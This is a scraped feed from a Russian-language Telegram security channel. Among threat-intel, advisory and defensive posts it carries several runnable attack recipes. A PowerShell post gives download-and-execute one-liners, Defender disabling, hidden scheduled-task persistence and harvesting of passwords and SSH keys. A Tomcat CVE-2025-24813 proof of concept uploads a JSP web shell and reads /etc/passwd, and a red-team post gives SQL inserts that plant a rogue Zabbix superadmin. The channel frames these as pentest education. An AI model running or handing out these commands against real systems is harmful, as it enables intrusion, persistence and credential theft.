Fsecurity | HH
2.06K subscribers
1.74K photos
105 videos
62 files
6.19K links
Канал про ИБ
Наш Discord: https://discord.gg/Eg8aDS7Hn7
Пожертвовать:
> https://www.donationalerts.com/r/xackapb
Download Telegram
Forwarded from s0ld13r ch. (s0ld13r)
Threat Intelligence drop ragghhhh 🕺🕺

Рефлексируя тематику этого канала, решил запустить небольшой комьюнити проект для шейра индикаторов компрометации и угроз которые таргетят Центральную Азию (и не только) 💃

Думаю это логичное продолжение тематики TI на канале, чтобы где то можно было собрать все находки и передавать их комьюнити ❤️

В скором времени начну активно добавлять IoC с различных исследований, фидов и залью индикаторы которые смог найти в предыдущих постах 😎

Буду рад вкладу каждого в развитие TI платформы (на базе MISP) — можно присылать свои находки, ссылки на репорты, дампы, фиды и просто идеи. Даже маленький IoC может оказаться критически важным для других, все абсолютно бесплатно и на безвозмездной основе, если будет желание подключиться и помочь то мой лс всегда открыт 😸

Рад представить вам
threatintel.kz 👋

🧢 s0ld13r
Please open Telegram to view this post
VIEW IN TELEGRAM
1
Discord сервер
👆🏻Тут можно пообщаться и найти много полезной информации 🦈
Forwarded from Whitehat Lab
🏃 Powershell Tips & Tricks

Для выполнения некоторых командлетов необходим импортированный AD модуль

🖥 ADModule

Подключаем:

Import-Module C:\Microsoft.ActiveDirectory.Management.dll -Verbose
iex (new-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/ADModule/master/Import-ActiveDirectory.ps1');Import-ActiveDirectory

или
Import-Module C:\Microsoft.ActiveDirectory.Management.dll -Verbose
Import-Module C:\ActiveDirectory\ActiveDirectory.psd1
Get-Command -Module ActiveDirectory


Информация о системе
:

Get-WmiObject -Class Win32_OperatingSystem | Select-Object -Property *


Список процессов:

Get-Process | Select-Object -Property ProcessName, Id, CPU | Sort-Object -Property CPU -Descending


FailureAudit в логах:

Get-EventLog -LogName Security | Where-Object {$_.EntryType -eq 'FailureAudit'}


Сканер портов:

1..1024 | ForEach-Object { $sock = New-Object System.Net.Sockets.TcpClient; $async = $sock.BeginConnect('localhost', $_, $null, $null); $wait = $async.AsyncWaitHandle.WaitOne(100, $false); if($sock.Connected) { $_ } ; $sock.Close() }


Выполнить команду на удаленном ПК:

Invoke-Command -ComputerName TargetPC -ScriptBlock { Get-Process } -Credential (Get-Credential)


Скачать и выполнить скрипт:

$url = 'http://example.com/script.ps1'; Invoke-Expression (New-Object Net.WebClient).DownloadString($url)


Execution policy bypass:

Set-ExecutionPolicy Bypass -Scope Process -Force; .\script.ps1


Список доменных юзеров:

# Нужен AD модуль
Get-ADUser -Filter * -Properties * | Select-Object -Property Name, Enabled, LastLogonDate


Список залогиненых юзеров:

Get-WMIObject -Class Win32_ComputerSystem -Computer "HOST01" | Select-Object Username


Давно не логинились, но УЗ включена:

# Нужен AD модуль
Get-ADuser -filter {enabled -eq "True"} -properties LastlogonDate | ? {$_.lastlogondate -le (get-date).adddays(-90)} | ft Name


Прибить процесс:

Get-Process -Name "Notepad" | Stop-Process -Force


Список установленного ПО:

Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, Publisher, InstallDate


Мониторинг изменений ФС
:

$watcher = New-Object System.IO.FileSystemWatcher; $watcher.Path = 'C:\'; $watcher.IncludeSubdirectories = $true; $watcher.EnableRaisingEvents = $true; Register-ObjectEvent $watcher 'Created' -Action { Write-Host 'File Created: ' $Event.SourceEventArgs.FullPath }


Отключаем Defender:

Set-MpPreference -SubmitSamplesConsent NeverSend
Set-MpPreference -MAPSReporting Disabled
Set-MpPreference -DisableRealtimeMonitoring $true


Задание в планировщик для закрепа:

$action = New-ScheduledTaskAction -Execute 'Powershell.exe' -Argument '-NoProfile -WindowStyle Hidden -Command "YourCommand"'; $trigger = New-ScheduledTaskTrigger -AtStartup; Register-ScheduledTask -Action $action -Trigger $trigger -TaskName 'MyTask' -Description 'MyDescription'


Поиск паролей в текстовых файлах:

Select-String -Path C:\Users\*\Documents\*.txt -Pattern 'password' -CaseSensitive


Собираем SSH ключи:

Get-ChildItem -Path C:\Users\*\.ssh\id_rsa -Recurse


Продолжение следует

#powershell #windows

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🤨 Искал медь, а нашёл золото

Наткнулся на настоящее сокровище для веб-пентестера — огромную подборку расширений для Burp Suite (Community и Pro) с их описанием на GitHub. Здесь есть всё, чтобы прокачать ваш инструмент до боевого монстра!

Внутри репозитория:
➡️Scanners — сканеры уязвимостей;
➡️Custom Features — уникальные доработки для Burp Suite;
➡️Beautifiers and Decoders — форматирование и декодирование данных;
➡️Cloud Security — тестирование облачных сервисов;
➡️Scripting — расширения для работы со скриптами и автоматизации тестирования;
➡️OAuth and SSO — инструменты для тестирования аутентификации;
➡️Information Gathering — сбор информации о целевой системе;
➡️Vulnerability Specific Extensions — инструменты под конкретные уязвимости;
➡️Web Application Firewall Evasion — обход систем веб-защиты;
➡️Logging and Notes — ведение логов и заметок во время тестов;
➡️Payload Generators and Fuzzers — генераторы полезных нагрузок и фаззеры;
➡️Cryptography — инструменты для работы с шифрами/хэшами;
➡️Tool Integration — расширения, связанные с интеграцией Burp Suite с другим программным обеспечением/инструментами;
➡️Misc — разные полезные расширения;
➡️Burp Extension Training Resources — обучающие материалы по работе с расширениями.

А какие добавленные расширения вам больше всего понравились?

🔗 Ссылка на подборку расширений Burp Suite

#github #материал
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from SecuriXy.kz
#️⃣ Критическая уязвимость в OpenVPN (TLS-crypt-v2) CVE-2025-2704

🧨 Удалённая DoS-атака на OpenVPN-сервер через повреждённые и переиспользованные пакеты в ранней фазе TLS-рукопожатия.

📌 Уязвимы версии:
2.6.1 - 2.6.13 (в режиме сервера с включённым `--tls-crypt-v2`)

⚠️ Атакующий с валидным TLS-ключом или доступом к трафику, может вызвать краш сервера с ASSERT()-ошибкой.

🔧 Рекомендации:
Обновитесь до последней версии
Временно отключите --tls-crypt-v2, если обновление невозможно

💬 👉 https://securityonline.info/cve-2025-2704-critical-bug-in-openvpn-can-trigger-server-crashes/
Forwarded from SecuriXy.kz
🔥 Path Equivalence в Apache Tomcat CVE-2025-24813
Критическая RCE-уязвимость из-за некорректной обработки ../ в PUT-запросах.

💥 Уязвимые версии:
Tomcat 11.0.0-M1 – 11.0.2
Tomcat 10.1.0-M1 – 10.1.34
Tomcat 9.0.0.M1 – 9.0.98
📌 Исправлено в: 11.0.3, 10.1.35, 9.0.99

🧨 Эксплуатация возможна при включённой записи через default servlet (по умолчанию выключено) и использовании partial PUT (включено по умолчанию).

📦 PoC:

curl -X PUT "http://target.com/uploads/../webapps/ROOT/updates.jsp" \
-H "Content-Type: application/x-jsp" \
--data-raw '<%@ page import="java.io.*" %>
<html><body>
<form method="GET"><input type="text" name="cmd"><input type="submit" value="Run"></form>
<% if(request.getParameter("cmd") != null) {
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
String l; while((l=r.readLine())!=null){ out.println(l+"<br>"); } } %>
</body></html>' -i


📥 Доступ к вебшеллу:

curl "http://target.com/updates.jsp?cmd=cat/etc/passwd" -i


📚 Подробнее: 👉 https://github.com/advisories/GHSA-83qj-6fr2-vhqg

‼️ EPSS: 93.5% — высокая вероятность эксплуатации в реальных атаках.

Обновляйте Tomcat или блокируйте PUT на уровне веб-сервера, если не используется.
Forwarded from SecuriXy.kz
💣 pgAdmin RCE CVE-2025-2945 -
Удалённое выполнение кода (RCE) в одном из самых популярных GUI-интерфейсов для PostgreSQL.

Актуально для всех версий pgAdmin ≤ 9.1

🧠 Уязвимость кроется в eval() - опасной функции, интерпретирующей строки как исполняемый код.

🎯 Уязвимые endpoints:

/sqleditor/query_tool/download/<int:trans_id>

/cloud/deploy

📌 Условия эксплуатации:
Нужна аутентификация
POST-запросы к указанным маршрутам

📉 Потенциал:
Полный захват сервера, выполнение произвольных команд, возможность lateral movement внутри инфраструктуры.

🔗 Подробнее: 👉 https://py0zz1.tistory.com/entry/Remote-Code-Execution-Vulnerability-in-pgAdmin-CVE-2025-2945

https://www.youtube.com/watch?v=V2WzCmRct7s
Discord сервер
👆🏻Тут можно пообщаться и найти много полезной информации 🦈
Forwarded from AppSecs
Представим ситуацию, у нас реализуется web-приложение с stateless сессиями — с использованием accessToken. Пользователь проходит аутентификацию, и backend-сервер выпускает accessToken и передает его клиенту.
Классический вопрос: «Где хранить accessToken на клиенте?».

Если JS-коду не нужно взаимодействовать с токеном, то единственным безопасным вариантом является хранение токена в Cookie с атрибутами HttpOnly, SameSite, Secure. Однако, как быть, если такая необходимость есть? Хранить токен в localStorage?

😏Чем плохо такое решение? Если хранить accessToken в localStorage, то при XSS у злоумышленника будет доступ к хранилищу браузера, и токен может быть украден.

На практике мне встречалась реализация, где разработчики и рыбку съели и токен хранили в Cookie, и подставляли его в HTTP Header через JS.
Как? Всё просто — они реализовали API, который возвращает в теле ответа все Cookie, которые передавались в HTTP запросе. JS-код брал токен из ответа и подставлял в HTTP заголовок Bearer для следующего запроса. По сути это обход защиты атрибута HttpOnly.

😏Чем плох этот вариант? Помимо XSS, при небезопасной конфигурации CORS, злоумышленник сможет получить токен жертвы из ответа сервера, заманив ее на подконтрольный ресурс.

Существует еще одно решение — хранить токен в переменной JS и обернуть его в замыкание. Однако у злоумышленника останется возможность влиять на контекст выполнения. Поэтому, более безопасный метод - предотвратить вмешательство с помощью XSS в среду выполнения, которая имеет токен, достигая изоляции контекста. В веб-фронтенде это можно сделать с помощью Web Workers.

Web Workers это механизм, который позволяет скрипту выполняться в фоновом потоке, который отделен от основного потока веб-приложения.


Идея заключается в том, чтобы поместить все запросы API в рабочий поток. Благодаря изоляции среды выполнения, если в рабочем потоке нет XSS, основной поток не может вмешаться в рабочего и не может получить доступ к его данным. Это обеспечивает безопасность токена.

Web Worker делится на три вида:
Dedicated workers: используется только одним скриптом
Shared workers: может использоваться несколькими скриптами в разных окнах/фреймах.
Service Workers: выполняет роль прокси-сервера для взаимодействия между веб-приложением, браузером и сетью.

🔍 В этой статье описывается пример использование Dedicated Worker и обоснование отказа от Service Worker.

🔍 В этой статье, напротив, используется Service Worker + описываются другие примеры использования «прослойки» между фронтом и беком. Например, в кейсе, который я описывал выше (с API, которая возвращает Cookie в ответе), можно было бы использовать прокси на бэке, отказавшись вовсе от работы JS-кода с токеном в браузере пользователя.
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from RedTeam brazzers (Миша)
Всем привет!

Обычно zabbix связан с базой PostgreSQL или MySQL. В некоторых случаях у вас может появиться возможность подключения к хосту, на котором эта самая база крутится. В таком случае вы сможете захватить весь Zabbix.

Алгоритм прост:
1. Вам следует получить доступ к базе, которая связана с Zabbix. Например, если вы получили RCE на Linux-сервере и смогли, допустим, повыситься до root, то переключайте контекст на пользователя postgres и аутентифицируйтесь на базе через psql. По умолчанию ph_hba.conf пустит вас без аутентификации.
su postgres
psql


2. Затем подключайтесь к базе zabbix
psql> \c zabbix


3. Теперь вам можно создавать собственного суперадмин-пользователя. Отмечу, что в базах MySQL и Postgres синтаксис команды будет немного отличаться. Для корректности добавления проверяйте необходимые для заведения поля вот так:
select * from users;


После чего добавляем собственного админ-пользователя:
# Хеш bcrypt UNIX, база Postgres (pentest:pentest)

INSERT INTO users(userid, username, name, surname, passwd, url, autologin, autologout, lang, refresh, theme, attempt_failed, attempt_ip, attempt_clock, rows_per_page, timezone, roleid) VALUES (6, 'pentest', 'pentest', 'pentest', '$2a$10$dXwCQEKhvXk4tdRvt0Ra/OGUU0.LUc0f.q6i8u4yiejrO9qVNjT6u', '', 0, 0, 'default', '30s', 'default', 0, '', 0, 150, 'default', 3);

# Хеш md5, MariaDB

INSERT INTO users(userid, alias, name, surname, passwd, url, autologin, autologout, lang, refresh, type, attempt_failed, attempt_ip, attempt_clock, rows_per_page) VALUES (6, 'pentest', 'pentest', 'pentest', '46ea1712d4b13b55b3f680cc5b8b54e8', '', 0, 0, 'default', '30s', 'default', 0, '', 0, 150);


4. Логинимся в Zabbix через главную страницу
Forwarded from s0ld13r ch. (s0ld13r)
This media is not supported in your browser
VIEW IN TELEGRAM
Выгоревший сотрудник SOC когда его попросили заняться еще одним "интересным кейсом" 🤬

#meme

🧢 s0ld13r
Please open Telegram to view this post
VIEW IN TELEGRAM
Discord сервер
👆🏻Тут можно пообщаться и найти много полезной информации 🦈
Forwarded from Adaptix Framework
Начал писать версию 0.4. Очень много нужно поменять в архитектуре экстендеров.

А пока покажу вот такие прикольные расширения: иногда легче "попросить" у пользователя учетные данные, нежели откуда-то извлекать)

P.S. pr на гите для расширений принимаются